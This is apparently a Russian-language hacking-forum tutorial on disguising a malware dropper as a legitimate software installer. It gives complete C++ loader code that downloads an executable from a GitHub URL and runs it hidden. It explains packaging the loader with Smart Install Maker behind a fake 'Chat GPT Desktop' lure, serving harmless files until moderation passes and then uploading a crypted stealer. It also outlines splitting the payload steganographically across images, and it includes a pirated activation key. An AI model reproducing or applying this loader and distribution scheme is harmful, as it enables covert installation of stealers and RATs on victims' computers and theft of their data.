Делаем инсталлятор софта с backdoor
Данный пример, всего лишь один из вариантов концепции распространения Stealer-ов, RAT и остальной малвари.
И так, нам понадобится следующий софт для реализации данного примера:
- Smart Install Maker
- Visual Studio
- Wget (для windows) см. бонус в конце
- Программа, которую по легенде будем распространять
- 1-2, 3… dll-ки, в зависимости сколько дерьма будете грузить.
- Зареганнный аккаунт на github или gitlab
Устанавливаем его и активируем (логин: phpbb3, пароль: Q8ZZZ-MV417-E0P2T-3MA3L-N24UV), иначе при инсталле вашего софта будет баннер что вы используете триальную версию Smart Install Maker.
Берем белый софт (файл), который будем распространять и выдавать за наш.
Можно выбрать любой софт, от ускорителей (бустеров), например gamebooster (смотри бонус в конце) до трейдинг-ботов. Лично я смастерил Chat GPT Desktop, так как по запросам в гугле он рулит, а вы включайте фантазию.
Создаем учетную запись на github.com (в моем случаи), можете создать на gitlab.
Из ранее скачанных безобидных DLL создаем SFX-архив (самораспаковывающийся), ставим на него пароль, в моем случаи «LOLZ» и грузим наш EXE файл (SFX-архив) на github в корень репозитория.
Открываем Visual Studio и повторяем как на скринах:
«создание проекта» --> «консольное приложение» даем нашему приложению название, в моем случаи «update» жмем «создать»:
В открывшемся окне все удаляем:
#pragma comment(lib, "urlmon.lib")
#include <Windows.h>
#include <string>
using namespace std;
int main()
{
URLDownloadToFile(0, L" https://github.com/blade-ass/lolz/raw/main/vcruntime140.exe", L" vcruntime140.exe", 0, 0);
ShellExecute(NULL, L"open", L" vcruntime140.exe", NULL, NULL, SW_HIDE);
return 0;
}
Второй вариант, можно делать через «create process»:
#pragma comment(lib, "urlmon.lib")
#include <Windows.h>
#include <string>
using namespace std;
int main()
{
HRESULT result = URLDownloadToFile(NULL, L https://github.com/blade-ass/lolz/raw/main/vcruntime140.exe ", L" vcruntime140.exe", L" vcruntime140.exe", 0, NULL);
if (result != S_OK) {
// Handle the error
return 1;
}
STARTUPINFO si = { sizeof(si) };
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_HIDE;
PROCESS_INFORMATION pi;
BOOL success = CreateProcess(L" vcruntime140.exe", NULL, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi);
if (!success) {
// Handle the error
return 1;
}
return 0;
}
После чего выбираем «Сборка» далее «Собрать решение» как на скринах.
И не забудьте заменить свои линки на github!!!
После успешной сборки кладем наш update.exe в папку с программой, которую будем выдавать за свою.
Дальше создаем проект в Smart Install Maker и не забываем менять инфу относительно своего файла, легенды или сайта (если такой есть).
Повторяем как на скринах или гуглим как пользоваться Smart Install Maker.
После, прописываем такие команды в проекте:
На выходе получаем наш setup.exe.
Ну, а после запуска setup.exe видим, что все прошло успешно. Как видно на скрине, наш инсталятор скачал нашу безобидную DLL с github.
Если у вас прошло все хорошо, тогда поздравляю!
Пока на github архив с безобидных DLL-ок, то инсталятор тоже безобидный, только стоит залить криптованный билд на github, получаем back door для нашего билда (стилера).
Также, можно сделать другую концепцию распространения.
Используя методы стеганографии, мы можем разделить своего "зверька" на несколько фрагментов (пикчи). Тогда уже не будет качаться .EXE файл, а только пикча (фрагмент кода), после успешных скачиваний фрагментов они собираються на ПК жертвы в единый файл (билд) и отрабатывают.
Соответсвенно такими софтами можно проходить модерации на биржах инсталов, и почти везде, так как пикчу можно выдавать за обновление для белого софта. То есть, пока проходим модерацию, то качаем безобидные файлы или DLL-ки, как только прошли модерацию, то на гитхаб залеваем наш зловред.